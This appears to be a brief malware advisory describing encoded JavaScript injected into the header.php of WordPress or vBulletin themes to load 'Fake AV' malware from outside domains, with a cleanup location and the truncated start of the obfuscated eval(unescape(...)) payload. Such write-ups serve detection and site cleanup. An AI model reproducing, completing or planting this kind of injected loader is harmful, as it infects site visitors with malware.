Description: Encoded javascript malware to load the "Fake AV" virus from
multiple domains (http://aversbonko.com, etc).
Affecting: WordPress or Vbulletin based web sites.
Clean up: Malware is hidden at the header.php inside the themes directory.
Malware dump:
eval(unescape(" %65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%68%4F%58%2C%73%6A%63%75%2C